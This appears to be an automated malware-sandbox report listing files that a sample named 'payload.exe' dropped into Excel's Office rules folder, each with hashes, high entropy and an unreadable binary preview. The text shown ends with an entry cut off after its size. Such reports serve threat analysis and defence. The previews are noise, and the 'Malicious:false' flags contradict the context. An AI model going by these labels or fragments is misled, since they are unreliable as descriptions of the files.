                                                                                                      Preview:<?xml...G'X6....B^u:H/.G[../)....%s...h!...._./H.F.?v...\&...[..r.Z.....5.Y.>0........F.<+..{. 4....KL.m.f..}p..e..Z....1.......b!=...E...*....v..im.1.B.^fF..s..[....aUw."...x.f.ZO....b..1._.......w...FPY+V.....>.|!e...PWC+2X.#..P>....Ch...1.~3*D..Z.cQ.v.n. .X.q.@Y.y..+G.....s.xL...^..A...t$..........4....g......SpH..3...@R.d8.....e..j.....T.}.O.K...&.#>.Y.!..D.P..c.K.....8.7.).I..E..p."o.....Y..0'.9M...H.....)...c...c.yN....gU....?...t....W7.$J'q@.%.Zt...?"Z.e..Vm.Xxp.W!.d.....F..q.d...>...B....1c.M-...P|...^q..B.4..\..P........e..[..T....V..?]..V$..F...5.G....>.....9p..+-)..V..]......7..FZ!.w...1'..>.po.........:ZDRYqV/er.P.G..q.....a...2.R\_j.Hn.."}S...k..9..^>.......!~K.uM:...)..c.J}lqhZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11209v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2272
                                                                                                      Entropy (8bit):7.918923789774719
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:RH8Q40fCtMgun69ANPqR58eXTrMZFsFEA5sNRuiwD:Rc+0M/QRxDQH/usWn
                                                                                                      MD5:4C9D3285DFC452CEE97700D054C5BF97
                                                                                                      SHA1:1F6771845CDC5E7B0E20D78F8846BC71DEA95064
                                                                                                      SHA-256:3CBCF5A989D55279FAECB863E8CF1BB92F741EAE27E7090FF143C63CA3D781DC
                                                                                                      SHA-512:73BF10E7B3AC5E3D90B08C8851710C41C99F279A504CA82BA547E25D81CD185C3B2A54C2B985EE8C8FC8FB07E5DD8EC6A656FF0C227486259A18F86F2964700E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....>8....-.d.hn.>fb..."..R...6I..m.6)hq.J..r/..mx'.b....3B/x..@...d..?Y..j.`..M.y..y..)..I[....N..DY.......q../_........yUe..dc.R.H.F..3.iK......>.y......h.[W...:Z./y>.MG.<b...X=1/.A..F9.!...x.:'...C..@..t.ttp..T.T{ _'b6.:,. ....*...d...J.K.dN..y.]..(....BQ.......'B..&Kf..}..O.nT....;.-.......3Y!#;..4b....z..;..o...ut{..........[..H.....o..5Q.9..0.i.YFn........V.0..j.....1....{=../;jw.0m*.Y..z./[`n...e..s.t.)..P...J.1.x....w./...xk...S.;.u?.........f.,$P.N..)d...Zp.'.Z.........r..9...J...*.Ey+.r.(.%..K..._.....6d....xY..(cH..FS{.m...H(...E&...*.....8Nu^]..!.3.....0.....h.....S;.v...0.bC.\.5z78...DP..v^.&..%.s...w..z.y..\dE.VK.p..E..../........(.N...1..{/.k....>.X......Nn.]D...6R..8..}..?3........ik....$...A.w..7.y.....Qy.F.....x...G/.V.M.(1.1.F....}.|.......O.....b@.....j..]............-..l\.\..{p..0....:..2..mq.......K.'.$..u...M...<0m.....5/...t.{2>.........7.:.....H..$#<....X.......;.G..cEF..>B...c/..t.s.C....y...]A..#

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11210v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1311
                                                                                                      Entropy (8bit):7.844634251644225
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Yr9OpAuI5yw1VOeFXBRAti1khD7MLYqysVHrB+bzAHDvpXgv6bD:+Rv5RFAtWkhnMHyiqzAHDvewD
                                                                                                      MD5:97DE19545A3598555EC49AC64BD464AF
                                                                                                      SHA1:8D0CF418E601C2733149D8005FC211FC7524B952
                                                                                                      SHA-256:CEF4C50C78FFBD5F94FA5FE939149002330EF0DFDEA4A0972F496616AAFE8C4C
                                                                                                      SHA-512:840D90AC9BB81EFA1D15C3E3530F3C828A014C89A872B3368B95AADB31F7FF11FE8C16480AC385AF0AA88B52195D70BA0DFD2F9BDD94F9CC1BD107C387E871C3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlej..6$...6.b)_..:_.xm..ho..z<...r..YC..(v.O.KF..j..x(X.By..~..@.MH.f.F......._..P..C;.,z...1N}.<..-.W....M.o....+N.Mhn^/q...n^@o.*-.OO.U...6....rs......O/~...7}a.&...E..].[...r.a0.5\.....[z..N..7~?......E{....^9fw\...lO.......X....0...A...q .h....D.^.+.tMV.i.V...".A......s...*..WhK..q.RCP..;.;$ZQ...VK>.O.Z.d.j.8Vv....@..57G/..._.....o.....xj)..%s...W.FXzk..X...T.z<..0.....$,3N........$..?E2P.,.P...J.=.n!~.s.yj.=....6.I....]Y7h..3..:..g.g.<.... ...'Uj......cO.v^F.ki.-..W.}.n;.B.."..'5D......m%...A...T.=...1.FI....glc~..#>......d.].#.......25uSP..Y.....:.!^p.~.j.....G..5!.'....e._.....+......n.0+~...g...cY gF.....A.b.`&.g...T..R..5.6....!+.E{.V>....C3\...Y.......o.j...y&Yg..w..F..[..N.....jo.9...64H..F4....n..Ad..jw._|.i....eT..0.....i...U....a...~[Y......3.W..t......".jI..]~....f..:..+j.FG..S1E.f6.W...D. ..Vx.1..I6........"E...@.%..RO.]!...B.....56.8.Px3'.n.0.B.3...f.....ksQ(.....J...|.z!p...h.o..!..i.....*.}..^t...k....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11264v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3172
                                                                                                      Entropy (8bit):7.949169050535698
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:W7btM7C5JeKIMauRryyp+k7z2QtJjrMhJL/gERTW4d:a70cZpftJ4dj04d
                                                                                                      MD5:F7CF9B09B272278AF0CFA670E73141FF
                                                                                                      SHA1:C148F333DEC3386D24484E378FABC89A744CB4FF
                                                                                                      SHA-256:6AB0475EA2752B6B5D385DA2F9E79D10933DC817832197019BC9C7FABED1DCE6
                                                                                                      SHA-512:9AB651936C65065CE5886A41629CE76254C449FE648372C804AD84505272C131A81D177A3AA7D77BA42BB00ED41B67BAC6567B28C2BAB3C7B79C02CA750AA52D
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.{.L.#...../....t....M.2...iy..P .F|.Q<L..@..$....n..u.......kf{t....M[s&......,....?S.,.3....lc..Y. ;.X%.....P+..6..g.Kv.q...4.od1S.[($....|..@...Z.......p.Cp+~.Q.B..p...0L"kP.).Y...q...n.@.B.MK......fpMz(..."~.Mg...Q...._YY.iw..`H.Ovo.........g......1..K./1L...$...x.K..UB....?..Y...Hb*m."\...z..&.......wu....;[P.MhS...G...y..F...r.N....?nO....%.. ..y.......K.t...A.-:.A.^z.|Z.j.W..Q...w/ .92;....!....E.D...Ow|.#.+OE.(...=t.*..C...-....U.U.M...f..A..H.e..I..&..H...M.<..Lc=..W....P......#..'...u...Z}V..s.N.....4.....]3.`.m..R.)..%.~qk....2.T..............~...p....|.4.....c;r\L2a.N..Sm...F...;....oB....p.R.r.~.z..z.~.w..@7..;..5F#5......W.U.>....8.M.m..8D-....5... XMr......}+hn.<.N.$..o.6i*:...U..M63.....x.>%.....T..R_*......h..j.f-.=.g.,.....90u..K.TK.8.bH.&....}..}.4.c#'!j.<m...%U..<l.]uo....m..+...X.V.'<.f..~....E......b..8<.....<.1..[=."....o.......P.5.N'qS...A8!.!....~.U.*.^.........o..{(.a|..A$.a..m4.6....'n....%h..wZ.k)....l

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11265v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2096
                                                                                                      Entropy (8bit):7.904456883586555
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:6ji/T+PpUBMR8HbJ0blpPGjpxB9JEYJhqeBsDQSJY5200VfTLkwD:/eUBTKb2FY2LBQ8x0pTZ
                                                                                                      MD5:F8A558EC341A4BF545636A08B165373E
                                                                                                      SHA1:CFBC086D3168EBBC44AE04FFE247E3C3F49D0BB4
                                                                                                      SHA-256:7BCAA684B37B1C5AB124475AC91F04BA2B715EB9F993BDCA2B00EE90B42D49C2
                                                                                                      SHA-512:153B97C81E3D95B41BAC397E752028C8E7ED04861143B8DAE303126C2A7163A09F6F9FB1DBC954E788CD5CCE96E95E3E2FD2A0BD3B989D87F0537E8F3985CA19
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlG<.D..0....&...v.P._.w...kc}_...m^...z....:.........3.T.C....N^.;01.o.x....'02j...........s.Y..:..z}.O...}................nU..>.$..'.l..u....+T/...0....}..+*...A..1Tz...&$.VAhk..#..;1f...6_.9.-....0vQ.K.o.!P..E6.6.,.Oh..|W..yY.......u.#.....L....a......_y.9..=....}..%..(B....#J......)..E.....CV...#..~.H#u{.s.Y......hQ@s.....A...2..a0QN!....9....BPAp...i8.Q......X9..'....4....{6..%@...8.Q.cw...~u..h.m9.d....6T]8....i(..R....,B.}z.X..Z..{V.....]...L..;.UdT....N...K.<.T..U...(/A..TK...y7...T...u.^......Fe.H...o1u.....]4....Z.....o..C..&{.r].@.b.../..A8.f....r~.F..l.lx.../....=$.f...=..`..u.....!..ZjN.....T......7........KTV..G.]r...&.ut..GL.p...x.&?.Q.....n`a.YH.w..C...Uf.8.?A..$....%..." .G......D...MJ..D%w@.t..>..y.S>Lw....@...Fx...!.c..4..G2.....zEly.({.D.IBU......|.......L..m......1_y!..;..ZRP/..q.!...`d$0.Km.p.R.....}&0.q...>*...c...3....<[ody..~..TR,F. ..qK...P..J!.t...G... hS,$"1.-QH.YwY....+|...Li..|.....M....:`.0.+..L.O...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11285v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):7525
                                                                                                      Entropy (8bit):7.973371433835469
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:/XwotwzwZ/pgon4jtzHgkcMgQmPH+KwGsaXqloHKSdawoYR:/tt2wZ/eoObgkczPHhwjaXquHKg
                                                                                                      MD5:895F37D6EAF4BFD800757C3CF416532A
                                                                                                      SHA1:E26589AA3A2942CCFC03F93D9450322FABC7C7D2
                                                                                                      SHA-256:95EC50B10D11ECE20916159CFE879F76A21452CDE1FB795AF6D5B17231645DEF
                                                                                                      SHA-512:0F94A1740F70375ABAC19A8339667DCDF0F9047C7898B9A42132CF09226E3D9EB50A3038011F5733136A9C48766F12AFB4A881A8CA572D379A5B0FDEDEE4EBA7
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.K.6.E.7..3.. .>..ht.".".s!...h..D..../...3z.#./.*.~o.>Q...........m......sU.......X..ZeU....[.y.s.w..9LrN.hT.05.p.......[Z..Ym..*.M...~....F....}=z..4..~.[.s... ..Bp.}.L..C.k.... /..e.q.Ox.e......p.-...G..=....."L.......S...D.y`....v$Dp.p,..X.r...].*]....1[..Q......j.e.4.....;..5V...J.....e...v&.v..._.[...-...58?.pB.W.....'H.A......c.8...uj4.U3..[G.q..\......,.K.!:....^.B.~4.z.....KJ.J...8...(...,.=i..[{..o..W..M.N9..1.....W....,.Y}.$.|...$RD..`I..B........6........M...M..}x.Sy.....4....#M.....G..(....D...(9+......&.....9.t.PyY...~T..=:.!d.a..}.....b0.........^.@..H2f........4^G~..B.W..+...RA.k.li.O.9kT.h...wM...m..j15Q...xu?.H.h[.=..:N.9.I...,~ .......$.jix....m.z3.u@..U...=...8.O#M.D\&.Y..I..p[!Z.r<..=gzW...v@..}.zs.........Ed.ls._....j..'..o.i...v.Y1(ru.JB'4-4..o..CeVsx.zE.'..<,.t0*;MM>n..p.m!......=u`....Ul.....B.v.X4..]VYtV7....ka..........R-./.:Q.5wh...UKV...EmM..s.8...@....V....-l4p."M^zMC...E..)...{0...`..y..}g .@...

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11289v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4197
                                                                                                      Entropy (8bit):7.95296826478722
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:32lh+YGr/4YhdvLAv/VGO5AugbXUwua+rbXnk:3CMYUwYhxLAH8HWvk
                                                                                                      MD5:3C51E385363E9C313606AF601281A0A2
                                                                                                      SHA1:58AD2CF160B98A21E25E9C59FE33E2DDA8D08F5C
                                                                                                      SHA-256:0504A0E436E297CE22F6D89CA0D8BDC56DEED6554AC4B9632DA555868A17DD4F
                                                                                                      SHA-512:88E17DA9528ECC250068C7959FC998DF7F822F21C00E87854E68E461518A0DFF6DFDC542342825E770B8A8EAA4EDB8C86D853E44229E5B4ABEEFF51BA073C3FF
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlnv..x.55+.=..H...A./.,..|z.3.2......d4OXlfh..3.b LY=m...)W......-.....]".... .5..wf...Sw.....9..ZX.a.a4..).,.ST%GA=..a.ZE~......A..}......7!t...d$O..M!.........c.......o............QjWA..0.q$7.I.K.D..L!.)=3.....vS+No.8k..*pW........oBz ...#.))0..... khO.P+!.R.>..-.$t.j..2xM....b.N.z.:.Z@.3.[C.o1.R.Q..[n.J.i..Cw.c}.......j/j...i.....'...q..-d.'.?.a.d2.~....B..>..4w`...Bj3b.s]J.N.*P..+...K.~......W\..........~.KU.e ..XF.......Q..{...p9..a?...^5...n....(.<..:....Ec...e?_.4lT..bx..vi....<H.......r.v`2.....SX.G?.D]..?O.OC.p..3.......l._T.K........X.....@M].BV.h..(..T'a....C.a4.IHX^J.FM........v< .frL.\Q..!."$.t._~.............`....[.i>.........h...f.w.&.c.p...Rcu....A..'.`b`....*?o....)..#N.....gs%(j.a...o.-LV...V...*.. c...c....1..z...=@.=^..6+.Q.6Ol.y..|... ..f....M.....z.}sp..@N.*...k......v.n2K.}.Y#D..9x.W~L.F.../q..b.)$..3;..A9p.u..a.F...6..f..t....S2.6.:W....w........5.t....UE65_bz.kWq...Ln...?....!..L4.C|^[..P0.......9....^..S..!v

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11300v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):4608
                                                                                                      Entropy (8bit):7.953215043309218
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:sdIkBeXry/S0BfWGeAADekcuwzOBxD56tg:bk+y/8GeAicujvD59
                                                                                                      MD5:B351C72A80C715BDB8CD38EE34DEBBEE
                                                                                                      SHA1:036500B802499FD381C3701EA3829CA85976A111
                                                                                                      SHA-256:036414E8DA8E18B9E310A5E4D28E0BE1C753BE2A74FFD73FA5B7AD00F9CC0FAE
                                                                                                      SHA-512:75CBCE7AD201D224CC45702719A1A86ABACE8B86309C3F20489BB98D2E9F12A3683D7DE8C3D4F106860DF375879E7592014CEBC10BADBD106453CFB8E5DCDB54
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml......I:.PE:...$.^.%...;V.R........:k..8.z..On}&..CIW..k..X.f.....O0%.."...t..q....t4.KQ._... .J.Q=.w..Q=F..7{.0J.k@a4<w.w,..^..c:j_..).\...,..mJ..$+..U....&.Y..P.7z..s9..D.F.6.........+..k.J.g.8t....ydp....."..$.__..4..._....s..I.W.......vS.y....I/<.Z........&..b4....X.u..*..d.e....<..N.|Q....f&l..rg.-...N.:h..x......0.I.lE.T$..{d....P...H.Oxl....g.g..T$...7z:..)..yrRF...r....$...X>.7...Rc.9x<*T+..E.........b.._....B..pp"..6|.Z.u$fs-tC.........*.7`..\H...&....=>.UhZ..........e.2....g..z....H..Q..[Z>_o..|.O....w..cQ..Y.|C.Q.or....6..:..=....nm*)h...$d0.W.X..3......Z0...hF.^..o.`..,.....;OcH-U.b..a..${.O..r&..*..Eh..Z..?...P6....v...}.4..[.}.X..1....|...W.Z.sR..Kb.n...G..>...j.Otg.V\.....4..`4.u..V_Y..*YB.T.^x....K;..IqY.....L.B....4....5..P.`.p2.si...}.J...c...'.Xl..p=e...........*..^7.8.......}T@T..p.k...C..NF.U...m.}=)%.......).......,.".6.......S..d...8..m.*.u...`.7....D....>....)*kr;.@`...~.s....2.tV..eF..L......Z......W..u..}..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11302v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2884
                                                                                                      Entropy (8bit):7.9313208627070315
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:vKRjAIxZr7hALYWOOxAQL38H4ZKU71nACCQdj7qQ6hCMtWR0FjDi7BJJHjXwD:v4lELYWtAK3fKEdACj7KAkqgjOdXHQ
                                                                                                      MD5:078BA2850C59561742283A9E8374ABA1
                                                                                                      SHA1:A31CC77259CAB695B37C02D634F45E8341BF51B9
                                                                                                      SHA-256:E38B53AFC5FD82CBFC6EA8438EA59FDFC2CF2E8C88C8AD15F7D6C98782C2C044
                                                                                                      SHA-512:255390640F13D1E4BD43DB17A6A33C35D26FDBA818D1D765DA63EA572E3EEB045E40D1F843706673E9F85E2482B25954A22C66C281318C4328A26200D779FDB6
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlP).....k..l1vE[I.?.T....HA..v'J.&.....#.Y.).$C.CS....EdVg.:^....H[.6.g....1.z...K......Id...N_.....'......8.....*N"............'..d..0.2.{...^.M...4..|n.[....i.g.,.z..~n.3.,..p......=KQ.......e"$q.D..O.....~/pM~...E.<.e.z.)...w.........W."....-M..x.m.l.^.9.+G h....H<..1I.9g.3.I.}Bi...P.......&...... .+......o..w.\<..,...Z........../.QCh....di.g...J...%]g#....D$..Gc..@dUQTY..........*..6.x...^..k.\...'.k,S..c..R.Ujk....ww.?....g..n..5|...|..H.@..1i.2.f.'P7v.V.{...T..b.]...h..8...o.x.5.}....pr..E....!..J..]:e<..+..\u...@.3D.....Op?.d..NB.e.^xa.Bq..Y....<c.U.."!..XhY..R......Al1fn.[....m.6...~.2.z..C..d...k.<..#.q.Z...[.#..)^..S.8.6Us.8....#...R.L.o.j.N.....m....n~Q.7..Xf.&.d...*.B..7.Pm..5.Dn../2Z...y.z.M.....^;...M....aO.n.Z[J..... ...e..\.0/.]B...e...............qA.[F..+..8...t.@..w.~B....#t..,$..~.Km.l3....#n...#o(..*.A..x.R-..s......<.@....."..K].!.s..-G_...y......P..%."...S.vt.w.P...i.~R..+Lgq./._i0Cim.z..n.q<t.(........c..D..`

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11362v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):5842
                                                                                                      Entropy (8bit):7.969314165914528
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:kvY/xBbi4xi4Lfis3PVVobchqbiHrkmB3j0vCM73CGLr9fjgqv7X09yYRj:qY/nbdc4bbuYHrN2b1Z0qv7X0BRj
                                                                                                      MD5:6AA03F4BE9F5634F2CED63F16B16714D
                                                                                                      SHA1:63718E6F9646FC886834A97C6D8558ED2C917211
                                                                                                      SHA-256:72BE78C950B43B4F203CF0CC62AFB2A6BA8B367E76879DB1CC3006FA554ED2ED
                                                                                                      SHA-512:0689254D42B491A258119F6320A4DA6A74A23DF97CAA177437F75786740367F83B1A6D450196F357855BAC482947B89083A20A56F60BEC1BBD6CB3ED3FCCEE14
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.q@e-.a...U........^..A.=-V.....{...a2I3...yI..hf......C\.)..p.+........#..Te.e.4..K.m....2&.....R&..E..j<..0....x`...}.l}..<9....]u....Y*f.h.l.)V%.%.P.......l......2t.m.p.[.3...j.v..BL.|.B^?..$...,XH..*w.t.f]".=.....e.s..@%..uZ...r.;:G.0V..i@sQ....(......g3g..2...<..f..a..P....Z......2/...I..WA....ji...^...s.....7.@)..m...O.y:.r..y.y/..... .a..Q.G.o4.{..y.o..}......o/4 D.y^..ttc.>....C..b....!:..x.k...Q5.........e\.@%..CG..;...y...}.ClU.YF5...q......gE..F}.8........U...M.4wTX..~.Y..`.fO.S%..}.@.o... .{.iQ...~.b...j;..5l7..'.l.....0...N....._R.xA.^.#........5.'.Y'..r..}..#s..!.._...u@.....z.~.j$........B..Y....4.wA.._*......h,.~..;...h..> ....4.#....W. ..j..c.".~QhQ..>..{&.x...I WAu..GA.XG..Si....ob...zF.m.7....o!Q.>a..WxS....YVDP..cIo.n^...r]..B+.:.#B1...5F..od4K.Yi..Rm.V.Dh...C.L.2.3+Y..B....Nz..m....S...-v......J...GC.6.y..y.I........8......z..h...P.7.i+....<.w~....].oi.oy...........N]z&D.Q................>/G..q..2.b...E.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11369v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2023
                                                                                                      Entropy (8bit):7.893326657635597
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:8M3ucIECoighg671YfVsVN7B1/8EEyfKiCzaKJAq/jwD:8M+cLGh671Yfmn/KiYa8I
                                                                                                      MD5:9B1D7EDD041136A3E138C20FAB5441DA
                                                                                                      SHA1:416067A575893BDD86AA4DEFD7E2BA8A734DA043
                                                                                                      SHA-256:2903D89ADCC80866F6F54D5128E2961CD736D32A0FB5A0652E2B1CE811312445
                                                                                                      SHA-512:B02111B8A8009E2509020AB62BA54E410A32FF86328166DE3380B6F475D6CF395DFE2D4A6843BD34A2762EE17B4824383F93E224320FED5DC7CAABDCF8059F59
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....U{..+.a..g.].l....#......)..(.....dl....u1..eJ.?.N.+j..9:..T!..l..4 ....K.A....UA.9...Rp...#.$.[...ElI.Sv.M.I.*.w...1. .@?.X.Br6..U...k./h.S...S.d....MOu...4.5.E...U....V.........j.kQ..._.k.._.l...}./.....u....;....q....So..R:.6.....jX..T.R.7..'3<.2...........:%.?....QC...q.O.!r.b.,8.Q.,V[.W..LL.r~..&.2wb)0r&.....J..,...%._.....^.x4.0.:k.y....{..}.....;N *.Xsz...cu.Gg.^.V...^.....'...Xp\..i.5.eY..%.db.E^..X...>..3.K...D.6H...0)...P..C..%....&...o.._..x.c..Uo......D!.-p... ..D....M.U.....nQ[#..a..i.*}..vPn6a.L@-.Q9T;..m........."........s.4s:.........TcH..2E..S..}.....`.RT"....R$.`B......{u@8...34a.n........#.?......k.....\...B....a.!....V..P.0...w...t.m.U...c........c.5.PgN..i.<...AS.;.+....n...^.Q.....o.q..,..rV%.].i.u&.\.3..}.aTt1....;......K....;.w.....W.....W.!..S.}I.>...V2.A.R.@...B...._....|..@..._<..;z[.k."*..nRu....7.6...4C..E..M...k..>.4.K.....}U._.9.u..(..y....A(dG..u.nI...j+.E.%p.F...\JA.|....M.).........GlM&.w.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11370v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1001
                                                                                                      Entropy (8bit):7.772820654947601
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:7qj2gMGqXVTx/4n4NSzME83R+e3Vfc5CKOrXXyYOv6bD:7qKgF8BSg3R+FCKObyYOwD
                                                                                                      MD5:E4AE3722420DC784A4D3C6C06B1D1F50
                                                                                                      SHA1:0880483F956A6F96F8AB64912B8004A5BCFCA050
                                                                                                      SHA-256:C418464FD205592E65A901D5269495A1D8C4CC48191D10C5EB1E550F74C9FA2B
                                                                                                      SHA-512:94E54FCF9CDF4F6EA01473A0DE3F15AB8BAC21E3B107FBA9C073162EEE6CE09D3166F2A1606AFA517E871E83F9AC9929E503EB34238793E20B86986E053A068E
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlak....=..6C4@...w..M'N.....F6O2.P. =....)AB.._d..=m.*..;Xz[}..n...!..g.`..8=...$....C..Y.l.d.M..dx...Y...E.}U!.P.4;..v..c$&........G4./n....wL....\...D...%....v7..sV.Y#7.Lm..F..%./e.C..........<&jWM.....A)......x..8#...{*.\.K_;L......N[K.1.........<....W.....P..d..\%..o8...8.*V.G.\......RjSkEa.S..I.j@..!-.m.pE....r.......U...&G......b......d~oW..R...c.......... .9X....Yi..Co.g..O..B-ug.g!x.4..8.{.k@.^@..Ds..@Q..A..S.....*.Xz6N...0}.U...cQ.>s.I.G.4..$....3....K.,h....&M.~.^$.d..s.w2.'V.sQ.J..}. ...4..(.Fs.'.g..........F.Rwrz..j..aR.....eJu.YS./K\.........0....@b............H..........,?.a...i61.{"reQ......+@..........rM...q^(W.?'.U...l.......9^.... }....Kq......^`.k..N....XB....e..Yg>[.G............qT...N.R{/.~H.ClD.l..1..}.....B.=..!...+)..].....l...:..o..,F...S.=....lc.{..CB....V....V.9..........Cx9..Q.y.......D.b.........z.....nu.../........E.\...5#E.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11381v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2743
                                                                                                      Entropy (8bit):7.930009725448151
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:n/SOLx1JmY/FB6PX1jcYyhdsTV8qdzNEWSZ4aIDw9tC0qc+gilwD:/5LovdSdsTV8lWjq9w0qqJ
                                                                                                      MD5:2B8193904A50D37EAD5B3518E8CBFC1C
                                                                                                      SHA1:6C22A3BD8987EED76A5F47978738264EC6325823
                                                                                                      SHA-256:B7C55ABD3DAFE74CBB3DFF9F55135E7ED8419C2FBBC9CFC2F44C90961076ECC1
                                                                                                      SHA-512:4FD367D90C06A320FD2B32A012A9FD63F40413123E408B656F7AD2E9F9739063321D3267313329297EB28E078C7DB3780B94B6EC8253B5602F5DBB5C0C8C4646
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlv.=...7Zu.Q.Y...o..7..r........+...<"E.7..E.*GX.H.(....-T..*...6}t.P..Z(.G..}\]..........y.v..|\\Bg.$gp.3.....].h..n>..CS.'.Iq...%.-..wd..|k....../c...Jcs\.j}:.L...&B.I.Tr.....P&......'E`W...St.6~.......'.`.eq.;....../4......,.z....;....1$X.......<H../..{..b.>....U.-..@......e...1.T.9F..;.....29...`..tX.f.....UC.>.c.tp..?.@.kI......E.2._f.v..^/.S..W......7..u...FwRJ.y"......2....~...N)..B....\......dg).....8-/.D..sC.Jj.0...(.P+..Iqm."..)yT.B9Ek.M.IW.m...o..>e...Zn2.o.dPM......^.O.......O...E..g"...X...+..?7...@.duX.].#P.w..qy...'@..B-);..;}$.i`.~.ms.]....b.x..............._..}/l. ).;.)......FY..f.?..C..).{ ..h.+.....5`....d.(f..\.,...[..].....F."+.X.I|...o.-,......X]o....t.`...1.\...c.J..r.@..k.|#]p....;..;.X...k...G....I.}.[./.p...U....|j.|.c.......k....1.|. ...J.Y...N.......<......KD..y=..q.....0zQ..r.)..%..C.....E..w...;......<...X..1.....G)+>.$q.M..../.....<.n=.^..co`.Yh~.Y.BP.;..n....w.r..7.RN.uC=.1.+/...b.."-.w.7......Uh.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules\rule11446v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):11063
